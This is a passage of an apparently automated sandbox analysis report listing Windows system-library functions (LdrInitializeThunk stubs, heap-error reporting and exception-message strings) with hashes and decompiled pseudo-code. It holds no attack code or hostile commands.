                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: fba910579496321c9402d9870ebdb920cf1cf8e71e6656f54eedbc777b989b6b
                                              • Instruction ID: d746790b6ba63a23dd29f714c96a354bb8735f4f07c2139832f49b66cdaa5a25
                                              • Opcode Fuzzy Hash: fba910579496321c9402d9870ebdb920cf1cf8e71e6656f54eedbc777b989b6b
                                              • Instruction Fuzzy Hash: 2990027221300413D21161A9454470700199BD0291FD1D412A041455CE96D68952B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 13 51f98f0-51f98fc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 993e110c8b227ec87b989f41e0ca6999ccd77eb26075c98d2b066c1f75fd500c
                                              • Instruction ID: dbb05620800fa2cb9af342c83a085ef32655c9b2da9abd754a47dc99f3c6fb9b
                                              • Opcode Fuzzy Hash: 993e110c8b227ec87b989f41e0ca6999ccd77eb26075c98d2b066c1f75fd500c
                                              • Instruction Fuzzy Hash: CD90026261300502D20171A94444616001A9BD0291FD1D022A1014559FCAE58992B171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 8 51f9710-51f971c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 6c31b29d5e5071de3123e13df781e496c305f9cb6c904db77027405ef15f89f8
                                              • Instruction ID: 5d17dd6d05867226d22f943e0f0df8376c4209bbd6cf38c75486b9e7533f6365
                                              • Opcode Fuzzy Hash: 6c31b29d5e5071de3123e13df781e496c305f9cb6c904db77027405ef15f89f8
                                              • Instruction Fuzzy Hash: 7690027221300402D20065E9544864600159BE0351F91E011A5014559FC6E588917171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 9 51f9780-51f978c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: fb3426e8bcd001e56c1710363ac7cc6fe4052be4f73e4325b8b0b8fb269b737b
                                              • Instruction ID: 41d20b7464f2cad3a7cd7d312225abce617277af4568ddb38359f3bf3b338c39
                                              • Opcode Fuzzy Hash: fb3426e8bcd001e56c1710363ac7cc6fe4052be4f73e4325b8b0b8fb269b737b
                                              • Instruction Fuzzy Hash: 1E90026A22300002D28071A9544860A00159BD1252FD1E415A000555CDC9D588696361
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 10 51f97a0-51f97ac LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 6bf35ca9bba077c64426a5263a68dc6119abdfb37b829762bca0a806b21beb1f
                                              • Instruction ID: cbad95ce431bc4a14dcba58c146015cc1e53d3e68d7ebc5c1ee75dba03c4b01c
                                              • Opcode Fuzzy Hash: 6bf35ca9bba077c64426a5263a68dc6119abdfb37b829762bca0a806b21beb1f
                                              • Instruction Fuzzy Hash: C190026231300003D24071A954586064015EBE1351F91E011E0404558DD9D588566262
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: df5aa182672883c7c853cffe4c9b02c185e314d640efaf94c18bc3352318540d
                                              • Instruction ID: 89a97dbbe9c4319f0f85dd083ac3e17060547c9d62d7bb723fb2a631f61e7a07
                                              • Opcode Fuzzy Hash: df5aa182672883c7c853cffe4c9b02c185e314d640efaf94c18bc3352318540d
                                              • Instruction Fuzzy Hash: 4F90027232314402D21061A9844470600159BD1251F91D411A081455CE86D588917162
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 16 51f9a00-51f9a0c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: e4d9f10ec09bf6d19eb9d8bbe98b32b6a2a3b1dd683f97152c756734e4e33dbb
                                              • Instruction ID: f08ca3556262b073b5b603bb1e0333aa5c5be4b0641130f9397823d6ae35a101
                                              • Opcode Fuzzy Hash: e4d9f10ec09bf6d19eb9d8bbe98b32b6a2a3b1dd683f97152c756734e4e33dbb
                                              • Instruction Fuzzy Hash: F190027221340402D20061A9485470B00159BD0352F91D011A1154559E86E5885175B1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 17 51f9a20-51f9a2c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 49a396039eee86ea40110c84843bac4e13d7122df476116e6a9e795ad50a9550
                                              • Instruction ID: 103acb6c176c3c64e374a97a992ce429aa9d5e08e27c0f54043c164f5fdb5c3c
                                              • Opcode Fuzzy Hash: 49a396039eee86ea40110c84843bac4e13d7122df476116e6a9e795ad50a9550
                                              • Instruction Fuzzy Hash: 2490026261300042424071B988849064015BFE1261791D121A0988554E85D9886566A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 06c6f39868689fae0efcd9d90f211e7a38384a359a5bb5a0e0ea2cc6a619cc3c
                                              • Instruction ID: bdc96751d69833f08a22c86eb84e9d40ab9567cca419f82e565b3d327f9bcc6f
                                              • Opcode Fuzzy Hash: 06c6f39868689fae0efcd9d90f211e7a38384a359a5bb5a0e0ea2cc6a619cc3c
                                              • Instruction Fuzzy Hash: 0890026222380042D30065B94C54B0700159BD0353F91D115A0144558DC9D588616561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 6 51f9660-51f966c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 324d2f309b5d413e380f3b906dcda4b33fc4435b6b61e2ec3e43dccc63043d00
                                              • Instruction ID: 034e486d5bf71efefec31312a28460e8c1717191be2f9744e7176ce77568e370
                                              • Opcode Fuzzy Hash: 324d2f309b5d413e380f3b906dcda4b33fc4435b6b61e2ec3e43dccc63043d00
                                              • Instruction Fuzzy Hash: 7590027221300802D28071A9444464A00159BD1351FD1D015A0015658ECAD58A5977E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 7 51f96e0-51f96ec LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: f876226d938c25ef5a83694084ab49f8b9be2f84671b210b4a2c2a4ac47c092f
                                              • Instruction ID: 01de613cb6f7d1f92eb6751b43d965d402059c298c6677702492efdf36fed9b7
                                              • Opcode Fuzzy Hash: f876226d938c25ef5a83694084ab49f8b9be2f84671b210b4a2c2a4ac47c092f
                                              • Instruction Fuzzy Hash: 7090027221308802D21061A9844474A00159BD0351F95D411A441465CE86D588917161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 51f967a-51f967f 1 51f968f-51f9696 LdrInitializeThunk 0->1 2 51f9681-51f9688 0->2
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 545399eb8f7c6098cbbabf1b4430ead5556fbbdd585da06ff5d9afbdc4585c75
                                              • Instruction ID: 67ec5c61aab372ffa808ddec6060ee4d8938ea865bd6658610ea4a6405081d27
                                              • Opcode Fuzzy Hash: 545399eb8f7c6098cbbabf1b4430ead5556fbbdd585da06ff5d9afbdc4585c75
                                              • Instruction Fuzzy Hash: B7B092B29034C5CAEB11E7B14A08B2B7A11BFD0761F66C062E2020A85B47B8C091F6B6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 0526B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Strings
                                              • The instruction at %p referenced memory at %p., xrefs: 0526B432
                                              • The critical section is owned by thread %p., xrefs: 0526B3B9
                                              • The resource is owned exclusively by thread %p, xrefs: 0526B374
                                              • *** Inpage error in %ws:%s, xrefs: 0526B418
                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0526B2DC
                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0526B38F
                                              • <unknown>, xrefs: 0526B27E, 0526B2D1, 0526B350, 0526B399, 0526B417, 0526B48E
                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 0526B352
                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0526B314
                                              • This failed because of error %Ix., xrefs: 0526B446
                                              • *** then kb to get the faulting stack, xrefs: 0526B51C
                                              • *** An Access Violation occurred in %ws:%s, xrefs: 0526B48F
                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0526B39B
                                              • write to, xrefs: 0526B4A6
                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0526B2F3
                                              • Go determine why that thread has not released the critical section., xrefs: 0526B3C5
                                              • read from, xrefs: 0526B4AD, 0526B4B2
                                              • The instruction at %p tried to %s , xrefs: 0526B4B6
                                              • a NULL pointer, xrefs: 0526B4E0
                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0526B323
                                              • *** enter .cxr %p for the context, xrefs: 0526B50D
                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0526B53F
                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0526B47D
                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0526B305
                                              • *** enter .exr %p for the exception record, xrefs: 0526B4F1
                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0526B484
                                              • The resource is owned shared by %d threads, xrefs: 0526B37E
                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0526B3D6
                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0526B476
                                              • an invalid address, %p, xrefs: 0526B4CF
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                              • API String ID: 0-108210295
                                              • Opcode ID: 4cd0b94789626b23d2624eb5d3c18e60bf8aea59116922e9fb679e9bfe727c46
                                              • Instruction ID: 15f56c8b59befe88cc88df5974421c1492620dfe6061e857cafd09a0917c9ff9
                                              • Opcode Fuzzy Hash: 4cd0b94789626b23d2624eb5d3c18e60bf8aea59116922e9fb679e9bfe727c46
                                              • Instruction Fuzzy Hash: EE81067AB60210FFDB2A9B059C99D7B3B36EF46751F400054F608AF112D7B58492DBB2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05271C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 44%
                                              			E05271C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x51948a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E051BB150();
				} else {
					E051BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x52a589c);
				E051BB150("Heap error detected at %p (heap handle %p)\n",  *0x52a58a0);
				_t27 =  *0x52a5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M05271E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E051BB150();
				} else {
					E051BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E051BB150("Error code: %d - %s\n",  *0x52a5898);
				_t113 =  *0x52a58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E051BB150();
					} else {
						E051BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E051BB150("Parameter1: %p\n",  *0x52a58a4);
				}
				_t115 =  *0x52a58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E051BB150();
					} else {
						E051BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E051BB150("Parameter2: %p\n",  *0x52a58a8);
				}
				_t117 =  *0x52a58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E051BB150();
					} else {
						E051BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E051BB150("Parameter3: %p\n",  *0x52a58ac);
				}
				_t119 =  *0x52a58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E051BB150();
					} else {
						E051BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x52a58b4);
					E051BB150("Last known valid blocks: before - %p, after - %p\n",  *0x52a58b0);
				} else {
					_t120 =  *0x52a58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E051BB150();
				} else {
					E051BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E051BB150("Stack trace available at %p\n", 0x52a58c0);
			}











                                              0x05271c10
                                              0x05271c16
                                              0x05271c1e
                                              0x05271c3d
                                              0x05271c3e
                                              0x05271c20
                                              0x05271c35
                                              0x05271c3a
                                              0x05271c44
                                              0x05271c55
                                              0x05271c5a
                                              0x05271c65
                                              0x05271c67
                                              0x00000000
                                              0x05271c6e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x05271c67
                                              0x05271cdc
                                              0x05271ce5
                                              0x05271d04
                                              0x05271d05
                                              0x05271ce7
                                              0x05271cfc
                                              0x05271d01
                                              0x05271d0b
                                              0x05271d17
                                              0x05271d1f
                                              0x05271d25
                                              0x05271d30
                                              0x05271d4f
                                              0x05271d50
                                              0x05271d32
                                              0x05271d47
                                              0x05271d4c
                                              0x05271d61
                                              0x05271d67
                                              0x05271d68
                                              0x05271d6e
                                              0x05271d79
                                              0x05271d98
                                              0x05271d99
                                              0x05271d7b
                                              0x05271d90
                                              0x05271d95
                                              0x05271daa
                                              0x05271db0
                                              0x05271db1
                                              0x05271db7
                                              0x05271dc2
                                              0x05271de1
                                              0x05271de2
                                              0x05271dc4
                                              0x05271dd9
                                              0x05271dde
                                              0x05271df3
                                              0x05271df9
                                              0x05271dfa
                                              0x05271e00
                                              0x05271e0a
                                              0x05271e13
                                              0x05271e32
                                              0x05271e33
                                              0x05271e15
                                              0x05271e2a
                                              0x05271e2f
                                              0x05271e39
                                              0x05271e4a
                                              0x05271e02
                                              0x05271e02
                                              0x05271e08
                                              0x00000000
                                              0x00000000
                                              0x05271e08
                                              0x05271e5b
                                              0x05271e7a
                                              0x05271e7b
                                              0x05271e5d
                                              0x05271e72
                                              0x05271e77
                                              0x05271e95

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                              • API String ID: 0-2897834094
                                              • Opcode ID: 6d96b5e6481c20ce34aab1a67e883cad4cc086d457bba2e64018ed612497ffdf
                                              • Instruction ID: 14f5868527c3c84fd421cc51137fbb8578907aeb8a920d1e34f9920f3c275077
                                              • Opcode Fuzzy Hash: 6d96b5e6481c20ce34aab1a67e883cad4cc086d457bba2e64018ed612497ffdf
                                              • Instruction Fuzzy Hash: 8B61F33B638549DFD612DB85E58DD2273BDEF04920B0D802EF50E6B642C7B49C90CE5A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051C3D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E051C3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E051C1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E051C1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
